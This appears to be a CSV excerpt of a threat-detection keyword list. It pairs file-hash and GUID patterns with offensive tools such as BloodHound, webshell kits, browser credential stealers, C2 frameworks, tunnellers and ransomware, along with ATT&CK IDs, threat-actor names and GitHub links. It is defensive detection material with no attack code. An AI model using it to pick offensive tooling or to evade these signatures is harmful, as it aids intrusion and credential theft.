"*a53e6802930fdf33441a3cf595c9b22e6800be07d72ace8b38a2f63f3fc806c1*",".{0,1000}a53e6802930fdf33441a3cf595c9b22e6800be07d72ace8b38a2f63f3fc806c1.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","32513"
"*a548aefc374dfd65cf3a1970eec4bb96111c89f97716f3b30fb46909d24436b8*",".{0,1000}a548aefc374dfd65cf3a1970eec4bb96111c89f97716f3b30fb46909d24436b8.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","32514"
"*a54ed10a2548f64bcf0a001636ab3578d277c3512cef54f0b0682d34266c8e6c*",".{0,1000}a54ed10a2548f64bcf0a001636ab3578d277c3512cef54f0b0682d34266c8e6c.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","32517"
"*a550b029c646ac0752424ac16545bf084de1052b349ce5f47e2c24ce1227ff16*",".{0,1000}a550b029c646ac0752424ac16545bf084de1052b349ce5f47e2c24ce1227ff16.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","32518"
"*a5553553f4c9056cff908df93f4dd7f498a9ce180048d1331ed00028d644ea00*",".{0,1000}a5553553f4c9056cff908df93f4dd7f498a9ce180048d1331ed00028d644ea00.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/moonD4rk/HackBrowserData","1","0","#filehash","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","32519"
"*a556e82073a4932a5202e78699a2e9db62afd3e3d0b9361f915d3b92b9d821d9*",".{0,1000}a556e82073a4932a5202e78699a2e9db62afd3e3d0b9361f915d3b92b9d821d9.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","32520"
"*a55f10e25a55f8d9d324cea77b455f4cbd711787a4ba874d2fd9255a30f39095*",".{0,1000}a55f10e25a55f8d9d324cea77b455f4cbd711787a4ba874d2fd9255a30f39095.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","32523"
"*a56757ad65727fec369f36a7c892618170bcdf89c22712d1c4010899c6ae9239*",".{0,1000}a56757ad65727fec369f36a7c892618170bcdf89c22712d1c4010899c6ae9239.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","32527"
"*a568c8a8c28b7ceeee2f5eec82f94dd4fb0fc06175b2ee3043f863a68451ebbd*",".{0,1000}a568c8a8c28b7ceeee2f5eec82f94dd4fb0fc06175b2ee3043f863a68451ebbd.{0,1000}","offensive_tool_keyword","Necro-Stealer","C++ stealer (passwords - cookies - forms - cards - wallets) ","T1078 - T1114 - T1555 - T1539 - T1212 - T1132","TA0006  - TA0010","N/A","N/A","Credential Access","https://github.com/SecUser1/Necro-Stealer","1","0","#filehash","N/A","8","1","6","1","2022-12-06T16:06:55Z","2022-12-06T15:52:17Z","32528"
"*a56c6bd3f1997f0ed36f75f019637acc01749de3a31a7ffce345b31e8c02860a*",".{0,1000}a56c6bd3f1997f0ed36f75f019637acc01749de3a31a7ffce345b31e8c02860a.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","32529"
"*a5737b1e8818b20b1f58e7bbcfd8ed2573dd4e3f81ad64fcd43666114878ce47*",".{0,1000}a5737b1e8818b20b1f58e7bbcfd8ed2573dd4e3f81ad64fcd43666114878ce47.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","32532"
"*a5789291ca04f1490a7b9478a9b8e1c37b594a59a101fd63d17a3eea11d04cd8*",".{0,1000}a5789291ca04f1490a7b9478a9b8e1c37b594a59a101fd63d17a3eea11d04cd8.{0,1000}","offensive_tool_keyword","Gato-X","automate advanced enumeration and exploitation techniques against GitHub repositories and organizations","T1190 - T1083 - T1588 - T1587","TA0001 - TA0007 - TA0005","N/A","N/A","Reconnaissance","https://github.com/adnanekhan/Gato-X","1","0","#filehash","N/A","7","3","270","35","2025-04-21T17:57:09Z","2024-01-27T18:55:16Z","32534"
"*a5819c67d51cee328e38c7822c9a4a9fe76e715f4863bcac8fa0ed5bdf046c21*",".{0,1000}a5819c67d51cee328e38c7822c9a4a9fe76e715f4863bcac8fa0ed5bdf046c21.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","32536"
"*a583acecdb43cd9b4806eddcf0582ec0cfd9281a2ff821b3d35c4d2dd6103eeb*",".{0,1000}a583acecdb43cd9b4806eddcf0582ec0cfd9281a2ff821b3d35c4d2dd6103eeb.{0,1000}","offensive_tool_keyword","Carseat","Python implementation of GhostPack Seatbelt situational awareness tool","T1012 - T1082 - T1087 - T1124 - T1217","TA0006 - TA0007 - TA0009","N/A","N/A","Collection","https://github.com/0xthirteen/Carseat","1","0","#filehash","N/A","8","3","257","21","2024-11-12T19:37:38Z","2024-11-08T02:08:53Z","32539"
"*a585d145f761ab45a617d83aecb895a363f95f5e282f549716f8397cb8006cb5*",".{0,1000}a585d145f761ab45a617d83aecb895a363f95f5e282f549716f8397cb8006cb5.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","32541"
"*a585eb434239e5c1714192482f20ec2483bf8eae4654ef77973524b3a151b455*",".{0,1000}a585eb434239e5c1714192482f20ec2483bf8eae4654ef77973524b3a151b455.{0,1000}","offensive_tool_keyword","Termite","Termite rootit abused by threat actors","T1014 - T1069 - T1055","TA0005 - TA0003 - TA0004","Operation TunnelSnake","Whitefly","Persistence","https://github.com/rootkiter/Binary-files/tree/212c43b40e2e4c2e2703400caaa732557b6080a4","1","0","#filehash","N/A","10","10","156","177","2021-01-26T23:16:49Z","2019-01-03T05:01:20Z","32542"
"*a58a13faa35a214b12f57674937f8ebf27eb62e29e26b7a00a624cc127197b50*",".{0,1000}a58a13faa35a214b12f57674937f8ebf27eb62e29e26b7a00a624cc127197b50.{0,1000}","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. Linux privilege escalation made easy","T1068 - T1548.004 - T1611 - T1203 - T1059.004","TA0004 - TA0001 - TA0002 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/liamg/traitor","1","0","#linux #filehash","N/A","10","10","6853","651","2024-03-12T21:01:14Z","2021-01-24T10:50:15Z","32543"
"*a58d7f84b2c5eb57cdf19378b21cbda2a1fbe135da57f0f6fc910813ed56a421*",".{0,1000}a58d7f84b2c5eb57cdf19378b21cbda2a1fbe135da57f0f6fc910813ed56a421.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","32545"
"*a58ef464df86f0f3dfab3123cae2fbfd6cb86b707f9dfa4a281ea0e9a40a858d*",".{0,1000}a58ef464df86f0f3dfab3123cae2fbfd6cb86b707f9dfa4a281ea0e9a40a858d.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/moonD4rk/HackBrowserData","1","0","#filehash","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","32546"
"*a58fa5635efa5a680c1861aca8a2e630b4031dadb901fe36df5e1f7018948275*",".{0,1000}a58fa5635efa5a680c1861aca8a2e630b4031dadb901fe36df5e1f7018948275.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/BC-SECURITY/Empire","1","0","#filehash","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","32547"
"*a58fd21735ae4781c5aa58714ac26575ae954aea83ca2bd501439f3c0416a1fd*",".{0,1000}a58fd21735ae4781c5aa58714ac26575ae954aea83ca2bd501439f3c0416a1fd.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","32548"
"*a591699874d0a2c26c1d9e47561ee2a3043fc3ea458c09a7ab8a24a25150cd0a*",".{0,1000}a591699874d0a2c26c1d9e47561ee2a3043fc3ea458c09a7ab8a24a25150cd0a.{0,1000}","offensive_tool_keyword","PewPewPew","host a script on a PowerShell webserver, invoke the IEX download cradle to download/execute the target code and post the results back to the server","T1059.001 - T1102 - T1056 - T1071 - T1086 - T1123","TA0011 - TA0010 - TA0005 - TA0002 - TA0009 - TA0006","N/A","N/A","Credential Access","https://github.com/PowerShellEmpire/PowerTools","1","0","#filehash","N/A","10","10","2106","815","2021-12-28T21:00:42Z","2014-03-06T14:49:51Z","32549"
"*a59b7561dd5d4715889191c2940059098a322528379a1d66dd1a960ffa87a601*",".{0,1000}a59b7561dd5d4715889191c2940059098a322528379a1d66dd1a960ffa87a601.{0,1000}","offensive_tool_keyword","PoolPartyBof","A beacon object file implementation of PoolParty Process Injection Technique","T1055.011 - T1055 - T1620","TA0005","N/A","Black Basta","Privilege Escalation","https://github.com/0xEr3bus/PoolPartyBof","1","0","#filehash","N/A","10","4","380","44","2023-12-21T19:00:20Z","2023-12-11T19:28:20Z","32551"
"*a59fce8872204dfb9885c0b1df12dd0da813aeb281699bf785783265fe27c415*",".{0,1000}a59fce8872204dfb9885c0b1df12dd0da813aeb281699bf785783265fe27c415.{0,1000}","offensive_tool_keyword","antSword","cross-platform website management toolkit - abused by attackers - supports the use of web shells","T1505.003 - T1059 - T1100 - T1027 - T1219 - T1071","TA0002 - TA0003 - TA0005 - TA0011","antSword webshell","APT41 - APT15","C2","https://github.com/AntSwordProject/antSword","1","0","#filehash","N/A","10","10","4010","616","2025-01-20T12:48:42Z","2016-03-11T09:28:00Z","32552"
"*a5a57a006b98eb951be3ac97064f7410f29c2b3a2bcd815baba49173db2d4b76*",".{0,1000}a5a57a006b98eb951be3ac97064f7410f29c2b3a2bcd815baba49173db2d4b76.{0,1000}","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0007","N/A","N/A","Discovery","https://github.com/lkarlslund/ldapnomnom","1","0","#filehash","N/A","6","10","1030","80","2024-11-09T10:15:13Z","2022-09-18T10:35:09Z","32553"
"*a5ab019bded982769759606c4e2120bd87f1df5f399baedb739268610df58541*",".{0,1000}a5ab019bded982769759606c4e2120bd87f1df5f399baedb739268610df58541.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1087.001 - T1087.002 - T1482 - T1016 - T1018 - T1046","TA0007 - TA0043 - TA0005 - TA0042","Dispossessor - Trickbot - Dridex - Locky - Uyghur - BlackCat - ALPHV - Defray777 - RansomExx","APT20 - TA505 - APT29 - GOLD DUPONT - Scattered Spider - UNC3944 - TA2101 - Wizard Spider - Grim Spider - Lunar Spider - Dispossessor","Discovery","https://github.com/BloodHoundAD/SharpHound","1","0","#filehash","N/A","N/A","10","904","195","2025-04-18T20:45:04Z","2021-07-12T17:07:04Z","32554"
"*A5B912EC-D588-401C-A84F-D01F98142B9E*",".{0,1000}A5B912EC\-D588\-401C\-A84F\-D01F98142B9E.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","0","#GUIDproject","N/A","6","10","3629","1661","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z","32555"
"*a5b9dc00d9009b755eea768d19d401d268a2ef7a7fa9dc7bc6183064a2d8f40a*",".{0,1000}a5b9dc00d9009b755eea768d19d401d268a2ef7a7fa9dc7bc6183064a2d8f40a.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","32556"
"*a5bd5b4800c559bdecc3cc32c76fe128e7e10f008a1224d9f6acfd06015b52a3*",".{0,1000}a5bd5b4800c559bdecc3cc32c76fe128e7e10f008a1224d9f6acfd06015b52a3.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#filehash","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","32557"
"*a5c8d558af0e8e3853cdd03be91dc7d915113a291466383005dbe1951809f663*",".{0,1000}a5c8d558af0e8e3853cdd03be91dc7d915113a291466383005dbe1951809f663.{0,1000}","offensive_tool_keyword","MegaMedusa","MegaMedusa is DDoS tool using NodeJS language","T1498 - T1498.001","TA0040","N/A","N/A","DDOS","https://github.com/TrashDono/MegaMedusa","1","0","#filehash","N/A","7","3","221","76","2025-03-20T17:26:23Z","2024-04-09T11:57:14Z","32559"
"*a5cbbccf1b4a7493f36eb7b51beb19c77a8ac044a4edfb2a5f13d6a00601eb29*",".{0,1000}a5cbbccf1b4a7493f36eb7b51beb19c77a8ac044a4edfb2a5f13d6a00601eb29.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043  - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","32560"
"*a5d3197567e9952913d0f76422b9a83c9b90f71dabdc8e22eb7dfdcf435ed69a*",".{0,1000}a5d3197567e9952913d0f76422b9a83c9b90f71dabdc8e22eb7dfdcf435ed69a.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","32562"
"*a5d8564157388d8d628ba9b8785307fd8cbbf3b6fafc1cd46160712a0015ced6*",".{0,1000}a5d8564157388d8d628ba9b8785307fd8cbbf3b6fafc1cd46160712a0015ced6.{0,1000}","offensive_tool_keyword","Poshito","Poshito is a Windows C2 over Telegram","T1102 - T1071.001 - T1571 - T1027","TA0011 - TA0005","N/A","N/A","C2","https://github.com/itaymigdal/Poshito","1","0","#filehash","N/A","7","10","10","1","2024-10-30T10:40:41Z","2024-09-10T20:14:17Z","32563"
"*a5da70fc881d99acc6cfc396eac2ed67957e89831a202e8610f3f48e2f181d8b*",".{0,1000}a5da70fc881d99acc6cfc396eac2ed67957e89831a202e8610f3f48e2f181d8b.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","32564"
"*a5db22a3b93fb89ea64a3027801002e968ab7d11e43b2c8e5173b33ac8fbb8eb*",".{0,1000}a5db22a3b93fb89ea64a3027801002e968ab7d11e43b2c8e5173b33ac8fbb8eb.{0,1000}","offensive_tool_keyword","File-Tunnel","Tunnel TCP connections through a file","T1071 - T1105 - T1090","TA0005 - TA0008 - TA0011","N/A","N/A","Lateral Movement","https://github.com/fiddyschmitt/File-Tunnel","1","0","#filehash","N/A","10","10","925","82","2025-04-19T15:06:09Z","2023-02-05T12:57:45Z","32565"
"*a5e057e11af84fb4e663c3d1f580dc6df73c2cca29bb63008717590f0d53883f*",".{0,1000}a5e057e11af84fb4e663c3d1f580dc6df73c2cca29bb63008717590f0d53883f.{0,1000}","offensive_tool_keyword","lolminer","NVIDIA+AMD GPU Miner","T1496","TA0040","N/A","N/A","Cryptomining","https://github.com/Lolliedieb/lolMiner-releases","1","0","#filehash","N/A","9","10","2781","601","2025-02-01T20:03:57Z","2018-10-27T20:35:03Z","32567"
"*a5e673ab3d8d4159b611981668487376eb2c61e3e3715dea1b50ec18d64eef76*",".{0,1000}a5e673ab3d8d4159b611981668487376eb2c61e3e3715dea1b50ec18d64eef76.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","32569"
"*a5e835c60f19233f4adf294821bbd82663e185ccd38444993e7be983235760af*",".{0,1000}a5e835c60f19233f4adf294821bbd82663e185ccd38444993e7be983235760af.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","0","#filehash","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","32570"
"*a5ebda39b87ecf276f28faaccef680a07435906f81001ff69cbe6acefe345ca6*",".{0,1000}a5ebda39b87ecf276f28faaccef680a07435906f81001ff69cbe6acefe345ca6.{0,1000}","offensive_tool_keyword","sish","An open source serveo/ngrok alternative. HTTP(S)/WS(S)/TCP Tunnels to localhost using only SSH","T1572 - T1090.002","TA0010 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antoniomika/sish","1","0","#filehash","N/A","10","10","4203","325","2025-04-10T20:04:08Z","2019-02-15T15:36:23Z","32572"
"*a5f10cdd2cd38b2b33a091c60f0e194aafd3a2de3ccbf80333882430a90034b6*",".{0,1000}a5f10cdd2cd38b2b33a091c60f0e194aafd3a2de3ccbf80333882430a90034b6.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","32573"
"*A5FDFE2A253B751DA1A84A41A2B501648735D027E03882CF363ACE84FE235034*",".{0,1000}A5FDFE2A253B751DA1A84A41A2B501648735D027E03882CF363ACE84FE235034.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","0","#filehash","N/A","10","10","1581","308","2025-04-14T13:31:01Z","2020-04-06T16:34:52Z","32575"
"*a60723c287985d0ff660c28a9558dc511a5be3cd2171778e2068f2950934e0c6*",".{0,1000}a60723c287985d0ff660c28a9558dc511a5be3cd2171778e2068f2950934e0c6.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","#filehash","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","32576"
"*a60858741df25450db9e46aa870a04fc3be70028fca27cb75b89f642e3ef31e4*",".{0,1000}a60858741df25450db9e46aa870a04fc3be70028fca27cb75b89f642e3ef31e4.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","32577"
"*a60a04cda101deaab5c2aa8b25c715fffc7a4f3e9813fa6d53a5b25dd4126fe2*",".{0,1000}a60a04cda101deaab5c2aa8b25c715fffc7a4f3e9813fa6d53a5b25dd4126fe2.{0,1000}","offensive_tool_keyword","Lsassx","Dumping LSASS Evaded Endpoint Security Solutions","T1003.001 - T1055.001 - T1203 - T1027 - T1070.004 - T1140 - T1564.001","TA0006 - TA0005 - TA0004","N/A","N/A","Credential Access","https://github.com/yehia-mamdouh/Lsassx","1","0","#filehash","N/A","10","1","12","3","2025-02-15T16:41:38Z","2025-02-15T16:36:27Z","32578"
"*a60cd6fd8facc92366caa76747ede2aba9c04a166f55d1ae6b84b264d0f2e5b1*",".{0,1000}a60cd6fd8facc92366caa76747ede2aba9c04a166f55d1ae6b84b264d0f2e5b1.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","32579"
"*a611f2d2b08ad8bffc69e578d6a99302114002e143b80f0bde003db299822b84*",".{0,1000}a611f2d2b08ad8bffc69e578d6a99302114002e143b80f0bde003db299822b84.{0,1000}","offensive_tool_keyword","GonnaCry","a linux ransomware","T1486 - T1059 - T1020 - T1083 - T1070","TA0040 - TA0005 - TA0009 - TA0010","N/A","N/A","Ransomware","https://github.com/tarcisio-marinho/GonnaCry","1","0","#filehash #linux","N/A","10","8","717","402","2025-01-24T13:39:57Z","2017-05-12T23:46:28Z","32580"
"*a615cf0f8929fd2950964a454bfb9ccdbd23c4ddda337035c9daa3ecb03859fe*",".{0,1000}a615cf0f8929fd2950964a454bfb9ccdbd23c4ddda337035c9daa3ecb03859fe.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","32581"
